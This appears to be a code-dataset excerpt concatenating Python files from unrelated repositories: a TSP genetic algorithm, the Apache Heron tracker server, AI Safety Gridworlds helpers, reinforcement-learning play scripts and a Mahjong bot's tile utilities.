Check for TSP type and return it (GEO, EUC_2D)
"""
for l in self.content:
if l.startswith("EDGE_WEIGHT_TYPE"):
index, space, rest = l.partition(':')
return rest.strip()
def get_city_coord(self, content):
start = self.content.index("NODE_COORD_SECTION")
end = self.content.index("EOF")
# use line instead of l, linter complaint...
for line in self.content[start + 1:end]:
line = line.strip()
city, space, coord = line.partition(" ")
coord = coord.strip()
x, space, y = coord.partition(" ")
self.city_coords[int(city)] = (x.strip(), y.strip())
return self.city_coords
def create_initial_tour(self):
for i in range(1, int(self.dimension) + 1):
self.city_tour_init.append(i)
return self.city_tour_init
def create_initial_coord_tuples(self):
city_tour_init = self.city_tour_init
content = self.city_coords
for i in city_tour_init:
self.city_tour_tuples.append(content.get(i))
return self.city_tour_tuples
```
#### File: 0xSteve/tsp_ga/tsp.py
```python
__author__ = "<NAME>"
__version__ = "0.0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
import array
import random
import numpy
from deap import algorithms
from deap import base
from deap import creator
from deap import tools
# Import my TSP stuff
from distance import *
from parser import *
# Create a new TSP
eil51 = Parser("eil51.tsp")
citylist = eil51.city_coords
# print(len(citylist))
# citylist = zip(citylist.get(1)[:-1], citylist.get(1)[1:])
# for u, v in citylist:
# print(u)
# print(v)
tours = TSPDistance(eil51.city_tour_init, eil51.city_coords)
distance_map = tours.distance_map
IND_SIZE = int(eil51.dimension)
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
creator.create("Individual", array.array, typecode='i',
fitness=creator.FitnessMin)
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
creator.create("Individual", array.array, typecode='i',
fitness=creator.FitnessMin)
toolbox = base.Toolbox()
# Attribute generator
toolbox.register("indices", random.sample, range(IND_SIZE), IND_SIZE)
# Structure initializers
toolbox.register("individual", tools.initIterate, creator.Individual,
toolbox.indices)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
def evalTSP(individual):
distance = distance_map[individual[-1]][individual[0]]
for gene1, gene2 in zip(individual[0:-1], individual[1:]):
distance += distance_map[gene1][gene2]
return distance,
toolbox.register("mate", tools.cxPartialyMatched)
toolbox.register("mutate", tools.mutShuffleIndexes, indpb=0.05)
toolbox.register("select", tools.selTournament, tournsize=3)
toolbox.register("evaluate", evalTSP)
def main():
random.seed(169)
pop = toolbox.population(n=100000)
hof = tools.HallOfFame(1)
stats = tools.Statistics(lambda ind: ind.fitness.values)
stats.register("avg_dist", numpy.mean)
stats.register("std", numpy.std)
stats.register("min_dist", numpy.min)
stats.register("max_dist", numpy.max)
algorithms.eaSimple(pop, toolbox, 0.7, 0.2, 1000, stats=stats,
halloffame=hof)
print('')
return pop, stats, hof
if __name__ == "__main__":
main()
``` |
{
"source": "0xStormEye/incubator-heron",
"score": 2
} |
#### File: python/handlers/clustershandler.py
```python
import tornado.gen
from heron.tools.tracker.src.python.handlers import BaseHandler
# pylint: disable=attribute-defined-outside-init
class ClustersHandler(BaseHandler):
"""
URL - /clusters
The response JSON is a list of clusters
"""
def initialize(self, tracker):
""" initialize """
self.tracker = tracker
@tornado.gen.coroutine
def get(self):
""" get method """
clusters = [statemgr.name for statemgr in self.tracker.state_managers]
self.write_success_response(clusters)
```
#### File: src/python/main.py
```python
import logging
import os
import signal
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.options import define
from tornado.httpclient import AsyncHTTPClient
from heron.tools.common.src.python.utils import config as common_config
from heron.common.src.python.utils import log
from heron.tools.tracker.src.python import constants
from heron.tools.tracker.src.python import handlers
from heron.tools.tracker.src.python import utils
from heron.tools.tracker.src.python.config import Config, STATEMGRS_KEY
from heron.tools.tracker.src.python.tracker import Tracker
import click
Log = log.Log
class Application(tornado.web.Application):
""" Tornado server application """
def __init__(self, config):
AsyncHTTPClient.configure(None, defaults=dict(request_timeout=120.0))
self.tracker = Tracker(config)
self.tracker.synch_topologies()
tornadoHandlers = [
(r"/", handlers.MainHandler),
(r"/clusters", handlers.ClustersHandler, {"tracker":self.tracker}),
(r"/topologies", handlers.TopologiesHandler, {"tracker":self.tracker}),
(r"/topologies/states", handlers.StatesHandler, {"tracker":self.tracker}),
(r"/topologies/info", handlers.TopologyHandler, {"tracker":self.tracker}),
(r"/topologies/logicalplan", handlers.LogicalPlanHandler, {"tracker":self.tracker}),
(r"/topologies/config", handlers.TopologyConfigHandler, {"tracker":self.tracker}),
(r"/topologies/containerfiledata", handlers.ContainerFileDataHandler,
{"tracker":self.tracker}),
(r"/topologies/containerfiledownload", handlers.ContainerFileDownloadHandler,
{"tracker":self.tracker}),
(r"/topologies/containerfilestats",
handlers.ContainerFileStatsHandler, {"tracker":self.tracker}),
(r"/topologies/physicalplan", handlers.PhysicalPlanHandler, {"tracker":self.tracker}),
(r"/topologies/packingplan", handlers.PackingPlanHandler, {"tracker":self.tracker}),
# Deprecated. See https://github.com/apache/incubator-heron/issues/1754
(r"/topologies/executionstate", handlers.ExecutionStateHandler, {"tracker":self.tracker}),
(r"/topologies/schedulerlocation", handlers.SchedulerLocationHandler,
{"tracker":self.tracker}),
(r"/topologies/metadata", handlers.MetaDataHandler, {"tracker":self.tracker}),
(r"/topologies/runtimestate", handlers.RuntimeStateHandler, {"tracker":self.tracker}),
(r"/topologies/metrics", handlers.MetricsHandler, {"tracker":self.tracker}),
(r"/topologies/metricstimeline", handlers.MetricsTimelineHandler, {"tracker":self.tracker}),
(r"/topologies/metricsquery", handlers.MetricsQueryHandler, {"tracker":self.tracker}),
(r"/topologies/exceptions", handlers.ExceptionHandler, {"tracker":self.tracker}),
(r"/topologies/exceptionsummary", handlers.ExceptionSummaryHandler,
{"tracker":self.tracker}),
(r"/machines", handlers.MachinesHandler, {"tracker":self.tracker}),
(r"/topologies/pid", handlers.PidHandler, {"tracker":self.tracker}),
(r"/topologies/jstack", handlers.JstackHandler, {"tracker":self.tracker}),
(r"/topologies/jmap", handlers.JmapHandler, {"tracker":self.tracker}),
(r"/topologies/histo", handlers.MemoryHistogramHandler, {"tracker":self.tracker}),
(r"(.*)", handlers.DefaultHandler),
]
settings = dict(
debug=True,
serve_traceback=True,
static_path=os.path.dirname(__file__)
)
tornado.web.Application.__init__(self, tornadoHandlers, **settings)
Log.info("Tracker has started")
def stop(self):
self.tracker.stop_sync()
def define_options(port: int, config_file: str) -> None:
""" define Tornado global variables """
define("port", default=port)
define("config_file", default=config_file)
def create_tracker_config(config_file: str, stmgr_override: dict) -> dict:
# try to parse the config file if we find one
config = utils.parse_config_file(config_file)
if config is None:
Log.debug(f"Config file does not exists: {config_file}")
config = {STATEMGRS_KEY:[{}]}
# update non-null options
config[STATEMGRS_KEY][0].update(
(k, v)
for k, v in stmgr_override.items()
if v is not None
)
return config
def show_version(_, __, value):
if value:
common_config.print_build_info()
sys.exit(0)
@click.command()
@click.option(
"--version",
is_flag=True,
is_eager=True,
expose_value=False,
callback=show_version,
)
@click.option('--verbose', is_flag=True)
@click.option(
'--config-file',
help="path to a tracker config file",
default=os.path.join(utils.get_heron_tracker_conf_dir(), constants.DEFAULT_CONFIG_FILE),
show_default=True,
)
@click.option(
'--port',
type=int,
default=constants.DEFAULT_PORT,
show_default=True,
help="local port to serve on",
)
@click.option(
'--type',
"stmgr_type",
help=f"statemanager type e.g. {constants.DEFAULT_STATE_MANAGER_TYPE}",
type=click.Choice(choices=["file", "zookeeper"]),
)
@click.option(
'--name',
help=f"statemanager name e.g. {constants.DEFAULT_STATE_MANAGER_NAME}",
)
@click.option(
'--rootpath',
help=f"statemanager rootpath e.g. {constants.DEFAULT_STATE_MANAGER_ROOTPATH}",
)
@click.option(
'--tunnelhost',
help=f"statemanager tunnelhost e.g. {constants.DEFAULT_STATE_MANAGER_TUNNELHOST}",
)
@click.option(
'--hostport',
help=f"statemanager hostport e.g. {constants.DEFAULT_STATE_MANAGER_HOSTPORT}",
)
def cli(
config_file: str,
stmgr_type: str,
name: str,
rootpath: str,
tunnelhost: str,
hostport: str,
port: int,
verbose: bool,
) -> None:
"""
An HTTP service for serving data about clusters.
The statemanager's config from the given config file can be overridden using
options on this executable.
"""
log.configure(logging.DEBUG if verbose else logging.INFO)
# set Tornado global option
define_options(port, config_file)
stmgr_override = {
"type": stmgr_type,
"name": name,
"rootpath": rootpath,
"tunnelhost": tunnelhost,
"hostport": hostport,
}
config = Config(create_tracker_config(config_file, stmgr_override))
# create Tornado application
application = Application(config)
# pylint: disable=unused-argument
# SIGINT handler:
# 1. stop all the running zkstatemanager and filestatemanagers
# 2. stop the Tornado IO loop
def signal_handler(signum, frame):
# start a new line after ^C character because this looks nice
print('\n', end='')
application.stop()
tornado.ioloop.IOLoop.instance().stop()
# associate SIGINT and SIGTERM with a handler
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
Log.info("Running on port: %d", port)
if config_file:
Log.info("Using config file: %s", config_file)
Log.info(f"Using state manager:\n{config}")
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
cli() # pylint: disable=no-value-for-parameter
``` |
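A small sketch of how the CLI overrides merge into the statemanager config; `missing.yaml` is a placeholder path, assumed here to make `parse_config_file` fall back to the default empty config.
```python
# Non-null overrides are merged into the first statemanager entry;
# None values (unset CLI options) are skipped by create_tracker_config.
overrides = {
    "type": "file",
    "name": "local",
    "rootpath": None,   # left unset on the command line
    "tunnelhost": None,
    "hostport": None,
}
config = create_tracker_config("missing.yaml", overrides)
# -> {STATEMGRS_KEY: [{"type": "file", "name": "local"}]}
```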
{
"source": "0xsuu/ai-safety-gridworlds",
"score": 2
} |
#### File: ai_safety_gridworlds/demonstrations/demonstrations.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from ai_safety_gridworlds.environments.shared.safety_game import Actions
# Demonstration data is stored as a named tuple.
Demonstration = collections.namedtuple('Demonstration',
['seed', 'actions', 'episode_return',
'safety_performance', 'terminates'])
# Dictionary containing the demonstration data. It's a mapping from environment
# name to a list of demonstrations.
_demonstrations = {
'boat_race': [Demonstration(0, 'rrddlluu'*12 + 'rrdd', 50, 100, True)],
'conveyor_belt': [Demonstration(0, 'dduu', 50, 50, False)], # Vase variant.
'distributional_shift': [Demonstration(0, 'ddrrrrrruu', 40, 40, True)],
'island_navigation': [Demonstration(0, 'dddl', 46, 46, True),
Demonstration(0, 'dldd', 46, 46, True),
Demonstration(0, 'ddld', 46, 46, True),
Demonstration(0, 'lddd', 46, 46, True)],
'safe_interruptibility': [Demonstration(17, 'dllllldd', 42, 42.0, True),
Demonstration(17, 'ddduullllldd', 38, 38.0, True),
Demonstration(33, 'd'+'l'*99, -100, 0.0, True),
Demonstration(33, 'ddduullllldd', 38, 0.0, True)],
'whisky_gold': [Demonstration(0, 'drrrru', 44, 44, True)],
'side_effects_sokoban': [Demonstration(0, 'ldrdrrulddr', 39, 39, True),
Demonstration(0, 'ldrdrrulrdd', 39, 39, True)],
}
# Dictionary for translating the human-readable actions into actual actions.
_actions = {'l': Actions.LEFT,
'r': Actions.RIGHT,
'u': Actions.UP,
'd': Actions.DOWN,
'q': Actions.QUIT}
def get_demonstrations(environment):
"""Returns a list of action sequences demonstrating good behavior.
Args:
environment: name of the environment.
Returns:
A list of `Demonstration`s. Each `Demonstration` is a named tuple with
a random seed, a sequence of `Actions`, an episode return, and a safety
performance score.
Raises:
ValueError: No demonstrations exist for this environment.
"""
if environment not in _demonstrations:
raise ValueError(
'No demonstrations for environment \'{}\'.'.format(environment))
def preprocess(demo):
"""Preprocessing turns the action strings into actual action sequences."""
return Demonstration(demo.seed, [_actions[c] for c in demo.actions],
demo.episode_return, demo.safety_performance,
demo.terminates)
return [preprocess(demo) for demo in _demonstrations[environment]]
def environment_names():
"""A set of the names of all environments with demonstrations."""
return set(_demonstrations.keys())
```
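A replay sketch using only the API above; `make_env` is a hypothetical factory for the matching environment, and the stepping convention is assumed from the usual ai-safety-gridworlds interface.
```python
# Hypothetical replay loop: `make_env(seed)` builds the matching environment.
for demo in get_demonstrations('island_navigation'):
    env = make_env(demo.seed)    # hypothetical factory, not part of this module
    episode_return = 0
    for action in demo.actions:  # already translated into Actions by preprocess
        timestep = env.step(action)
        episode_return += timestep.reward or 0
    assert episode_return == demo.episode_return
```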
#### File: shared/rl/pycolab_interface.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from ai_safety_gridworlds.environments.shared.rl import array_spec as specs
from ai_safety_gridworlds.environments.shared.rl import environment
class Environment(object):
"""A generic Python interface for pycolab games."""
def __init__(self, game_factory, discrete_actions, default_reward,
observation_distiller, continuous_actions=None,
max_iterations=float('inf')):
"""Construct a `Base` adapter that wraps a pycolab game.
For each episode, a new pycolab game is supplied by the `game_factory`
argument. The structure of games' rewards is restricted to scalar values,
while actions passed to the games are either scalar values as well or
concatenated flat lists of scalar values. The structure of the
`discrete_actions` and `continuous_actions` determines the structure of the
actions received by the game as follows:
| `discrete_actions` is | `continuous_actions` is | action is |
|------------------------|-------------------------|-----------------------|
| a `(min, max)` 2-tuple | `None` | a scalar |
| `None` | a `(min, max)` 2-tuple | a scalar |
|------------------------|-------------------------|-----------------------|
| a list of N 2-tuples | `None` | a list of N scalars |
| `None` | a list of N 2-tuples | a list of N scalars |
|------------------------|-------------------------|-----------------------|
| a list of N 2-tuples | a `(min, max)` 2-tuple | a list of N+1 scalars |
| a `(min, max)` 2-tuple | a list of N 2-tuples | a list of N+1 scalars |
|------------------------|-------------------------|-----------------------|
| a `(min, max)` 2-tuple | a `(min, max)` 2-tuple | a list of 2 scalars |
| a list of N 2-tuples | a list of M 2-tuples | a list of N+M scalars |
Here, a scalar action may be an int or float as appropriate, or a numpy
array with a single element.
Whenever there are arrays containing both discrete and continuous actions,
the discrete actions always precede the continuous ones.
The format of your observations depends on the value returned by your
`observation_distiller`. If a numpy array, then the observations will be a
dict whose single entry, `'board'`, is that array. Otherwise, your distiller
should return a dict mapping string names to numpy arrays whose dimensions
and contents are of your choosing.
If a game ever terminates, the episode is considered terminated. The game
underway will be discarded and a new game built by the `game_factory`.
Args:
game_factory: a callable that returns a fully-constructed pycolab
game engine. The `its_showtime` method should not have been called yet
on the returned games. For most predictable results, this callable
should be stateless.
discrete_actions: a `(min, max)` tuple or a list of such tuples, or `None`
if the game does not use discrete actions. See discussion above.
default_reward: a reward to return to clients of this `environment.Base`
adapter when (or if) the game issues a reward of None. Should probably
be a scalar (0.0 is a typical choice); should definitely have the same
dimensions and type as the non-None rewards returned by `game_factory`
games.
observation_distiller: a callable that takes the `rendering.Observation`s
generated by `game_factory`-returned game engines and converts them
into numpy arrays (or dicts of numpy arrays). The `Distiller` class
in this module documents further requirements for this argument and
provides a common idiom that may be adequate for many use cases.
continuous_actions: a `(min, max)` tuple or a list of such tuples, or
`None` if the game does not use continuous actions. See discussion
above.
max_iterations: the maximum number of game iterations that an episode may
last before it gets terminated. By default, this is unlimited, but if
specified it prevents games from going on forever.
Raises:
TypeError: the game returned by `game_factory` appears to have a reward
type that doesn't match the type of the `default_reward` value. This
check is not particularly rigorous (it won't descend into lists,
and can't do the check if the game returns a reward of `None` on the
`its_showtime` call).
ValueError: `discrete_actions` and `continuous_actions` were both `None`
or empty lists.
"""
# Save important constructor arguments.
self._game_factory = game_factory
self._default_reward = default_reward
self._observation_distiller = observation_distiller
self._max_iterations = max_iterations
# These slots comprise an Environment's internal state. They are:
self._state = None # Current Environment game step state.
self._current_game = None # Current pycolab game instance.
self._game_over = None # Whether the instance's game has ended.
self._last_observations = None # Last observation received from the game.
self._last_reward = None # Last reward, if any, or default reward.
self._last_discount = None # Last discount factor from the game.
# Attempt to distill our action spec.
self._valid_actions, self._action_size = self._compute_action_spec(
discrete_actions, continuous_actions)
# With this, we're ready to compute our own observation spec. This is done
# by starting a new episode, inspecting the observations returned in the
# first step, then closing the episode and resetting internal variables
# to a default value.
self._observation_spec = self._compute_observation_spec()
def reset(self):
"""Start a new episode."""
# Build a new game and retrieve its first set of state/reward/discount.
self._current_game = self._game_factory()
self._state = environment.StepType.FIRST
# Collect environment returns from starting the game and update state.
observations, reward, discount = self._current_game.its_showtime()
self._update_for_game_step(observations, reward, discount)
return environment.TimeStep(
step_type=self._state,
reward=None,
discount=None,
observation=self.last_observations)
def step(self, action):
"""Apply action, step the world forward, and return observations."""
if self._action_size == 1:
# Handle a float or single-element arrays of any dimensionality. Strictly
# speaking, a single-element list will also work, but it's best not to
# confuse matters in the docstring with this option.
all_actions = [np.asarray(action).item()]
else:
all_actions = [np.asarray(a).item() for a in action]
if len(all_actions) != self._action_size:
raise RuntimeError("A pycolab Environment adapter's step method "
'was called with actions that were not compatible '
'with what the pycolab game expects.')
# Clear episode internals and start a new episode, if episode ended or if
# the game was not already underway.
if self._state == environment.StepType.LAST:
self._drop_last_episode()
if self._current_game is None:
return self.reset()
# Execute the action in pycolab.
action = all_actions[0] if self._action_size == 1 else all_actions
observations, reward, discount = self._current_game.play(action)
self._update_for_game_step(observations, reward, discount)
# Check the current status of the game.
if self._game_over:
self._state = environment.StepType.LAST
else:
self._state = environment.StepType.MID
return environment.TimeStep(
step_type=self._state,
reward=self._last_reward,
discount=self._last_discount,
observation=self.last_observations)
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._valid_actions
@property
def last_observations(self):
"""Distill and return the last observation."""
# A "bare" numpy array will be placed in a dict under the key "board".
if isinstance(self._last_observations, dict):
observation = self._last_observations
else:
observation = {'board': self._last_observations}
return observation
### Various helpers. ###
def _compute_action_spec(self, discrete_actions, continuous_actions):
"""Helper for `__init__`: compute our environment's action spec."""
valid_actions = []
# First discrete actions:
if discrete_actions is not None:
try:
# Get an array of upper and lower bounds for each discrete action.
min_, max_ = zip(*discrete_actions)
# Total number of discrete actions provided on each time step.
shape = (len(discrete_actions),)
except TypeError:
min_, max_ = discrete_actions # Enforces 2-tuple.
shape = (1,)
spec = specs.BoundedArraySpec(shape=shape,
dtype='int32',
minimum=min_,
maximum=max_,
name='discrete')
valid_actions.append(spec)
# Then continuous actions:
if continuous_actions is not None:
try:
# Get an array of upper and lower bounds for each continuous action.
min_, max_ = zip(*continuous_actions)
# Total number of continuous actions provided on each time step.
shape = (len(continuous_actions),)
except TypeError:
min_, max_ = continuous_actions # Enforces 2-tuple
shape = (1,)
spec = specs.BoundedArraySpec(shape=shape,
dtype='float32',
minimum=min_,
maximum=max_,
name='continuous')
valid_actions.append(spec)
# And in total we have this many actions.
action_size = sum(value.shape[0] for value in valid_actions)
if action_size <= 0:
raise ValueError('A pycolab Environment adapter was initialised '
'without any discrete or continuous actions specified.')
# Use arrays directly if we only have one.
if len(valid_actions) == 1:
valid_actions = valid_actions[0]
return valid_actions, action_size
def _compute_observation_spec(self):
"""Helper for `__init__`: compute our environment's observation spec."""
# Start an environment, examine the values it gives to us, and reset things
# back to default.
timestep = self.reset()
observation_spec = {k: specs.ArraySpec(v.shape, v.dtype, name=k)
for k, v in timestep.observation.items()}
# As long as we've got environment result data, we try checking to make sure
# that the reward types can be added together---a very weak way of measuring
# whether they are compatible.
if timestep.reward is not None:
try:
_ = timestep.reward + self._default_reward
except TypeError:
raise TypeError(
'A pycolab game wrapped by an Environment adapter returned '
'a first reward whose type is incompatible with the default reward '
"given to the adapter's `__init__`.")
self._drop_last_episode()
return observation_spec
def _update_for_game_step(self, observations, reward, discount):
"""Update internal state with data from an environment interaction."""
# Save interaction data in slots for self.observations() et al.
self._last_observations = self._observation_distiller(observations)
self._last_reward = reward if reward is not None else self._default_reward
self._last_discount = discount
self._game_over = self._current_game.game_over
# If we've reached the maximum number of game iterations, terminate the
# current game.
if self._current_game.the_plot.frame >= self._max_iterations:
self._game_over = True
def _drop_last_episode(self):
"""Clear all the internal information about the game."""
self._state = None
self._current_game = None
self._game_over = None
self._last_observations = None
self._last_reward = None
self._last_discount = None
class Distiller(object):
"""A convenience class for `observation_distiller` parameters.
An "observation distiller" is any function from the `rendering.Observation`s
generated by a pycolab game to a numpy array or a dict mapping string
keys to numpy arrays. While any callable performing this transformation is
usable as the `observation_distiller` parameter to the `Environment`
constructor, happy users tend to have these callables be stateless.
This class is sugar for a common pattern, which is to distill `Observation`s
first by repainting the characters that make up the observations and then to
convert the resulting `Observation` into one or more numpy arrays for
tendering to TensorFlow. For the former, a
`rendering.ObservationCharacterRepainter` will probably meet your needs; for
the latter, consider `rendering.ObservationToArray` or
`rendering.ObservationToFeatureArray`.
Or don't; I'm a docstring, not a cop.
"""
def __init__(self, repainter, array_converter):
"""Construct a Distiller.
Args:
repainter: a callable that converts `rendering.Observation`s to different
`rendering.Observation`s, or None if no such conversion is required.
This facility is normally used to change the characters used to
depict certain game elements, and a
`rendering.ObservationCharacterRepainter` object is a convenient way
to accomplish this conversion.
array_converter: a callable that converts `rendering.Observation`s to
a numpy array or a dict mapping strings to numpy arrays.
"""
self._repainter = repainter
self._array_converter = array_converter
def __call__(self, observation):
if self._repainter: observation = self._repainter(observation)
return self._array_converter(observation)
``` |
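A minimal construction sketch for the adapter above; `make_game` and `my_array_converter` are hypothetical stand-ins for a real pycolab game factory and observation converter.
```python
# Hypothetical: `make_game` returns an un-started pycolab engine and
# `my_array_converter` maps rendering.Observation -> numpy array.
distiller = Distiller(repainter=None, array_converter=my_array_converter)
env = Environment(
    game_factory=make_game,
    discrete_actions=(0, 3),  # one scalar action in [0, 3]
    default_reward=0.0,
    observation_distiller=distiller,
    max_iterations=500,
)
timestep = env.reset()
timestep = env.step(2)        # a scalar, since the spec is a single 2-tuple
```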
{
"source": "0xsuu/Project-Mahjong",
"score": 2
} |
#### File: rl_algorithms/test/play_cartpole.py
```python
from dqn_cartpole import *
import gym
def main():
env = gym.make("CartPole-v0")
agent = DQNCartpole(env.action_space.n, mode=PLAY, load=True)
total_reward = 0
observation = env.reset()
for step in range(300):
env.render()
action = agent.make_action(observation)
observation, reward, done, _ = env.step(action)
total_reward += reward
if done:
break
env.close()
print("Total reward:", total_reward)
if __name__ == "__main__":
main()
```
#### File: rl_algorithms/test/play_gomoku.py
```python
from gomoku_test import *
class GomokuEnvUI(GomokuEnv):
def __init__(self, player_color, opponent, board_size, agent=None):
GomokuEnv.__init__(self, player_color, opponent, board_size)
self._agent = agent
def dqn_wrapper(self, curr_state, prev_state, prev_action):
return self._agent.make_action(curr_state.board.encode())
def _reset_opponent(self, board):
if self.opponent == "dqn":
self.opponent_policy = self.dqn_wrapper
else:
super()._reset_opponent(board)
def input_to_action(input_string):
input_string = input_string.capitalize()
x_coord = ord(input_string[0]) - ord("A")
y_coord = int(input_string[1]) - 1
return y_coord * 9 + x_coord
def main():
agent = DQNGomoku(GomokuEnv("black", "random", 9).action_space.n, mode=PLAY)
env = GomokuEnvUI("black", "dqn", 9, agent)
env.reset()
done = False
while not done:
env.render()
_, reward, done, _ = env.step(input_to_action(input(":")))
if done:
if reward > 0:
print("Player win!")
else:
print("Bot win!")
if __name__ == "__main__":
main()
```
#### File: supervised_learning/train_data/Data.py
```python
def asdata(obj, asdata):
if isinstance(obj, Data):
return obj.asdata(asdata)
elif isinstance(obj, str):
return obj
elif hasattr(obj, '_asdict'):
return asdata(obj._asdict(), asdata)
elif isinstance(obj, dict):
return dict((k, asdata(v, asdata)) for (k, v) in obj.items())
else:
try:
return list(asdata(child, asdata) for child in obj)
except TypeError:  # obj is not iterable
return obj
class Data:
def asdata(self, asdata = asdata):
return dict((k, asdata(v, asdata)) for (k, v) in self.__dict__.items())
def __repr__(self):
return self.asdata().__repr__()
```
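A quick example of the recursive conversion, using only the code above.
```python
class Point(Data):
    def __init__(self, x, y):
        self.x = x
        self.y = y

p = Point(1, [2, 3])
print(p.asdata())  # {'x': 1, 'y': [2, 3]}
print(p)           # __repr__ delegates to asdata(), so the same output
```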
#### File: mahjong/ai/main.py
```python
from mahjong.ai.agari import Agari
from mahjong.ai.base import BaseAI
from mahjong.ai.defence import Defence
from mahjong.ai.shanten import Shanten
from mahjong.tile import TilesConverter
class MainAI(BaseAI):
version = '0.0.6'
agari = None
shanten = None
defence = None
def __init__(self, table, player):
super(MainAI, self).__init__(table, player)
self.agari = Agari()
self.shanten = Shanten()
self.defence = Defence(table)
def discard_tile(self):
results, shanten = self.calculate_outs()
if shanten == 0:
self.player.in_tempai = True
# we won!
if shanten == Shanten.AGARI_STATE:
return Shanten.AGARI_STATE
# Disable defence for now
# if self.defence.go_to_defence_mode():
# self.player.in_tempai = False
# tile_in_hand = self.defence.calculate_safe_tile_against_riichi()
# if we wasn't able to find a safe tile, let's discard a random one
# if not tile_in_hand:
# tile_in_hand = self.player.tiles[random.randrange(len(self.player.tiles) - 1)]
# else:
# tile34 = results[0]['discard']
# tile_in_hand = TilesConverter.find_34_tile_in_136_array(tile34, self.player.tiles)
tile34 = results[0]['discard']
tile_in_hand = TilesConverter.find_34_tile_in_136_array(tile34, self.player.tiles)
return tile_in_hand
def calculate_outs(self):
tiles = TilesConverter.to_34_array(self.player.tiles)
shanten = self.shanten.calculate_shanten(tiles)
# win
if shanten == Shanten.AGARI_STATE:
return [], shanten
raw_data = {}
for i in range(0, 34):
if not tiles[i]:
continue
tiles[i] -= 1
raw_data[i] = []
for j in range(0, 34):
if i == j or tiles[j] >= 4:
continue
tiles[j] += 1
if self.shanten.calculate_shanten(tiles) == shanten - 1:
raw_data[i].append(j)
tiles[j] -= 1
tiles[i] += 1
if raw_data[i]:
raw_data[i] = {'tile': i, 'tiles_count': self.count_tiles(raw_data[i], tiles), 'waiting': raw_data[i]}
results = []
tiles = TilesConverter.to_34_array(self.player.tiles)
for tile in range(0, len(tiles)):
if tile in raw_data and raw_data[tile] and raw_data[tile]['tiles_count']:
item = raw_data[tile]
waiting = []
for item2 in item['waiting']:
waiting.append(item2)
results.append({
'discard': item['tile'],
'waiting': waiting,
'tiles_count': item['tiles_count']
})
# if we have character and honor candidates to discard with the same tiles count,
# we need to discard the honor tile first
results = sorted(results, key=lambda x: (x['tiles_count'], x['discard']), reverse=True)
return results, shanten
def count_tiles(self, raw_data, tiles):
n = 0
for i in range(0, len(raw_data)):
n += 4 - tiles[raw_data[i]]
return n
```
#### File: ai/tests/tests_defence.py
```python
import unittest
from mahjong.ai.defence import Defence
from mahjong.table import Table
class DefenceTestCase(unittest.TestCase):
def test_go_to_the_defence_mode(self):
table = Table()
defence = Defence(table)
self.assertFalse(defence.go_to_defence_mode())
table.players[1].in_riichi = True
self.assertTrue(defence.go_to_defence_mode())
table.players[0].in_riichi = True
self.assertFalse(defence.go_to_defence_mode())
def test_calculate_safe_tiles_to_discard(self):
table = Table()
table.get_main_player().init_hand([3, 5, 6, 7, 8])
defence = Defence(table)
table.players[1].in_riichi = True
table.players[1].add_discarded_tile(2)
tile = defence.calculate_safe_tile_against_riichi()
# 0, 1, 2, 3 are the same tile
self.assertEqual(tile, 3)
```
#### File: tenhou-bot/mahjong/client.py
```python
from mahjong.stat import Statistics
from mahjong.table import Table
from utils.general import make_random_letters_and_digit_string
class Client(object):
statistics = None
id = ''
position = 0
def __init__(self, use_previous_ai_version=False):
self.table = Table(use_previous_ai_version)
self.statistics = Statistics()
self.player = self.table.get_main_player()
self.id = make_random_letters_and_digit_string()
def authenticate(self):
pass
def start_game(self):
pass
def end_game(self):
pass
def init_hand(self, tiles):
self.player.init_hand(tiles)
def draw_tile(self, tile):
self.table.count_of_remaining_tiles -= 1
self.player.draw_tile(tile)
def discard_tile(self):
return self.player.discard_tile()
def call_meld(self, meld):
# when an opponent calls a meld, it means
# that he will not take a tile from the wall,
# so we need to compensate for the "-" in the enemy discard method
self.table.count_of_remaining_tiles += 1
return self.table.get_player(meld.who).add_meld(meld)
def enemy_discard(self, player_seat, tile):
self.table.get_player(player_seat).add_discarded_tile(tile)
self.table.count_of_remaining_tiles -= 1
for player in self.table.players:
if player.in_riichi:
player.safe_tiles.append(tile)
def enemy_riichi(self, player_seat):
self.table.get_player(player_seat).in_riichi = True
```
#### File: tenhou-bot/mahjong/tile.py
```python
class Tile(int):
TILES = '''
1s 2s 3s 4s 5s 6s 7s 8s 9s
1p 2p 3p 4p 5p 6p 7p 8p 9p
1m 2m 3m 4m 5m 6m 7m 8m 9m
ew sw ww nw
wd gd rd
'''.split()
def as_data(self):
return self.TILES[self // 4]
class TilesConverter(object):
@staticmethod
def to_one_line_string(tiles):
"""
Convert 136 tiles array to the one line string
Example of output: 123m123p123s33z
"""
tiles = sorted(tiles)
man = [t for t in tiles if t < 36]
pin = [t for t in tiles if 36 <= t < 72]
pin = [t - 36 for t in pin]
sou = [t for t in tiles if 72 <= t < 108]
sou = [t - 72 for t in sou]
honors = [t for t in tiles if t >= 108]
honors = [t - 108 for t in honors]
sou = sou and ''.join([str((i // 4) + 1) for i in sou]) + 's' or ''
pin = pin and ''.join([str((i // 4) + 1) for i in pin]) + 'p' or ''
man = man and ''.join([str((i // 4) + 1) for i in man]) + 'm' or ''
honors = honors and ''.join([str((i // 4) + 1) for i in honors]) + 'z' or ''
return man + pin + sou + honors
@staticmethod
def to_34_array(tiles):
"""
Convert 136 array to the 34 tiles array
"""
results = [0] * 34
for tile in tiles:
tile //= 4
results[tile] += 1
return results
@staticmethod
def string_to_136_array(sou=None, pin=None, man=None, honors=None):
"""
Method to convert one line string tiles format to the 136 array
We need it to increase readability of our tests
"""
def _split_string(string, offset):
data = []
if not string:
return []
for i in string:
tile = offset + (int(i) - 1) * 4
data.append(tile)
return data
results = _split_string(man, 0)
results += _split_string(pin, 36)
results += _split_string(sou, 72)
results += _split_string(honors, 108)
return results
@staticmethod
def string_to_34_array(sou=None, pin=None, man=None, honors=None):
"""
Method to convert one line string tiles format to the 34 array
We need it to increase readability of our tests
"""
results = TilesConverter.string_to_136_array(sou, pin, man, honors)
